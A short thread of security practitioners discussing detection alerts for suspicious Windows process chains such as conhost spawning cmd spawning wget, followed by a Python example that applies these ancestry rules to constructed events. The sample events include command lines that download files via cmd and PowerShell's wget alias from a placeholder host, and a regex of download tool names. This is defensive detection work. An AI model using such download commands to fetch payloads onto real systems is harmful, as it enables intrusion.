If you’re not already alerting on

CONHOST.EXE spawning CMD.EXE spawning WGET.EXE

or

CONHOST.EXE spawning CONHOST.EXE spawning CONHOST.EXE

you’re gonna want to close that gap today.

@pmelson …wget? Why not curl (which is built-in).

(and I should really update my wget binaries)

@jernej__s I’m just reporting on what I’m seeing.

@pmelson That looks like it's invoking PowerShell's wget built-in (which is an alias for Invoke-WebRequest), so you won't see wget.exe running anywhere.

@jernej__s @pmelson You will see powershell process downloading data from an external location.

More focus on behaviour - less focus on tooling.

@Ichinin @pmelson Yeah, but the original post was about alerting on conhost → cmd → wget, which won't work in this case (it'll be conhost → cmd → powershell).

@jernej__s @Ichinin I was unaware that ‘wget’ is an alias for IWR. What version(s) of PowerShell does that work for?

@pmelson @Ichinin Every version, as far as I know (and there have been complaints about this since the beginning, because neither the wget nor the curl PowerShell built-ins work anything remotely like the real programs).
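As an added example (not code from anyone in the thread), the following runs the three process-ancestry rules discussed above over a constructed set of process-creation events, and covers the PowerShell case by matching the download aliases (wget, curl, iwr, Invoke-WebRequest) in the command line rather than looking for wget.exe. The event shape (pid, ppid, image, cmd) and the sample values are assumptions for illustration.

```python
# Added example: ancestry-based detection over constructed process-creation events.
import re

# Constructed sample events; field names are an assumption, not a real log format.
EVENTS = [
    {"pid": 100, "ppid": 1,   "image": "explorer.exe",   "cmd": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": "conhost.exe",    "cmd": "conhost.exe"},
    {"pid": 300, "ppid": 200, "image": "cmd.exe",        "cmd": "cmd.exe /c wget http://example.invalid/a.bin"},
    {"pid": 400, "ppid": 300, "image": "wget.exe",       "cmd": "wget http://example.invalid/a.bin"},
    {"pid": 500, "ppid": 200, "image": "cmd.exe",        "cmd": "cmd.exe /c powershell wget http://example.invalid/b.bin -OutFile b.bin"},
    {"pid": 600, "ppid": 500, "image": "powershell.exe", "cmd": "powershell wget http://example.invalid/b.bin -OutFile b.bin"},
    {"pid": 700, "ppid": 200, "image": "conhost.exe",    "cmd": "conhost.exe"},
    {"pid": 800, "ppid": 700, "image": "conhost.exe",    "cmd": "conhost.exe"},
    {"pid": 900, "ppid": 100, "image": "cmd.exe",        "cmd": "cmd.exe /c dir"},
]

# PowerShell built-ins that download without any wget.exe or curl.exe ever running.
PS_DOWNLOAD = re.compile(r"\b(wget|curl|iwr|Invoke-WebRequest)\b", re.IGNORECASE)


def ancestry(events, pid, depth=3):
    """Return [image, parent image, grandparent image, ...], at most `depth` entries."""
    by_pid = {e["pid"]: e for e in events}
    chain = []
    while pid in by_pid and len(chain) < depth:
        chain.append(by_pid[pid]["image"].lower())
        pid = by_pid[pid]["ppid"]
    return chain


def detect(events):
    """Return (pid, rule) pairs for the chains discussed in the thread."""
    hits = []
    for e in events:
        chain = ancestry(events, e["pid"])
        if chain == ["wget.exe", "cmd.exe", "conhost.exe"]:
            hits.append((e["pid"], "conhost>cmd>wget.exe"))
        elif chain == ["powershell.exe", "cmd.exe", "conhost.exe"] and PS_DOWNLOAD.search(e["cmd"]):
            # Behaviour-based variant: the alias case leaves no wget.exe process.
            hits.append((e["pid"], "conhost>cmd>powershell download alias"))
        elif chain == ["conhost.exe", "conhost.exe", "conhost.exe"]:
            hits.append((e["pid"], "conhost>conhost>conhost"))
    return hits


if __name__ == "__main__":
    for pid, rule in detect(EVENTS):
        print(pid, rule)
```

Real telemetry (Sysmon event 1, Windows 4688) carries full image paths and may lack a parent for long-lived ancestors, so normalise the image name and tolerate short chains before using this shape in production.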